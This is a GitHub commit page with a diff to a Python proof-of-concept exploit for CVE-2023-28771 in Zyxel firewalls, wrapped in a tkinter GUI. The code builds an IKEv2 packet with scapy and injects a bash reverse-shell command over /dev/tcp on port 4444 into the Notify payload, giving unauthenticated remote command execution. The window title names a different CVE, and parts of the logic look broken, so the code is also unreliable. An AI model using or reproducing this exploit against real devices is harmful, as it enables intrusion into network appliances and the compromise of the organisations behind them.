Skip to content

Commit

Permalink
Update CVE_2023_28771_poc.py
Browse files Browse the repository at this point in the history
Signed-off-by: ibrahim ali <[email protected]>
  • Loading branch information
abrahim7112 authored Aug 30, 2023
1 parent 005b8d6 commit 6477adc
Showing 1 changed file with 29 additions and 29 deletions.
58 changes: 29 additions & 29 deletions CVE_2023_poc/CVE_2023_28771_poc.py
Original file line number Diff line number Diff line change
Expand Up @@ -10,39 +10,39 @@
from tkinter import ttk
import requests

root = tkinter.Tk()
root.title("CVE_2023_0861 exploits")
root.geometry('600x400+0+0')
def printInput():
inp = inputtxt.get(1.0, "end-1c")
lbl.config(text = "attack url : "+inp)
def exploitprint():
root = tkinter.Tk()
root.title("CVE_2023_0861 exploits")
root.geometry('600x400+0+0')
def printInput():
inp = inputtxt.get(1.0, "end-1c")
lbl.config(text = "attack url : "+inp)

scroll_y = Scrollbar(root, orient=VERTICAL)
txtarea = Text(root, yscrollcommand=scroll_y.set, font=(
"times new roman", 15, "bold"), fg="#3206b8")
scroll_y.pack(side=RIGHT, fill=Y)
scroll_y.config(command=txtarea.yview)
txtarea.pack(fill=BOTH, expand=1)
scroll_y = Scrollbar(root, orient=VERTICAL)
txtarea = Text(root, yscrollcommand=scroll_y.set, font=("times new roman", 15, "bold"), fg="#3206b8")
scroll_y.pack(side=RIGHT, fill=Y)
scroll_y.config(command=txtarea.yview)
txtarea.pack(fill=BOTH, expand=1)

rhost = inp
lhost = '0.0.0.0'
lport = '4444'
rhost = inp
lhost = '0.0.0.0'
lport = '4444'

load_contrib('ikev2')
load_contrib('ikev2')

cmd = "\";bash -c \"exec bash -i &>/dev/tcp/" + lhost + "/" + lport + " <&1;\";echo -n \""
cmd = "\";bash -c \"exec bash -i &>/dev/tcp/" + lhost + "/" + lport + " <&1;\";echo -n \""


packet = IP(dst = rhost) / UDP(dport = 500) / IKEv2(init_SPI = RandString(8), next_payload = 'Notify', exch_type = 'IKE_SA_INIT', flags='Initiator') / IKEv2_payload_Notify(next_payload = 'Nonce', type = 14, load = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB" + cmd) / IKEv2_payload_Nonce(next_payload = 'None', load = RandString(68))
packet = IP(dst = rhost) / UDP(dport = 500) / IKEv2(init_SPI = RandString(8), next_payload = 'Notify', exch_type = 'IKE_SA_INIT', flags='Initiator') /IKEv2_payload_Notify(next_payload = 'Nonce', type = 14, load = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB" + cmd) / IKEv2_payload_Nonce(next_payload = 'None', load = RandString(68))

send(packet)
txtarea.insert(END, packet)
Hacher = Label(root, text="Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73,\n VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35,\n and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker\n to execute some OS commands remotely by sending crafted packets to an affected device.").pack()
Hacher = Label(root, text="Enter domin www.example.com : ").pack()
inputtxt = tk.Text(root,height = 1,width = 80)
inputtxt.pack()
printButton = tk.Button(root,text = "exploit", command = printInput)
printButton.pack()
lbl = tk.Label(root, text = "")
lbl.pack()
root.mainloop()
send(packet)
txtarea.insert(END, packet)
Hacher = Label(root, text="Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73,\n VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35,\n and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker\n to execute some OS commands remotely by sending crafted packets to an affected device.").pack()
Hacher = Label(root, text="Enter domin www.example.com : ").pack()
inputtxt = tk.Text(root,height = 1,width = 80)
inputtxt.pack()
printButton = tk.Button(root,text = "exploit", command = printInput)
printButton.pack()
lbl = tk.Label(root, text = "")
lbl.pack()
root.mainloop()

0 comments on commit 6477adc

Please sign in to comment.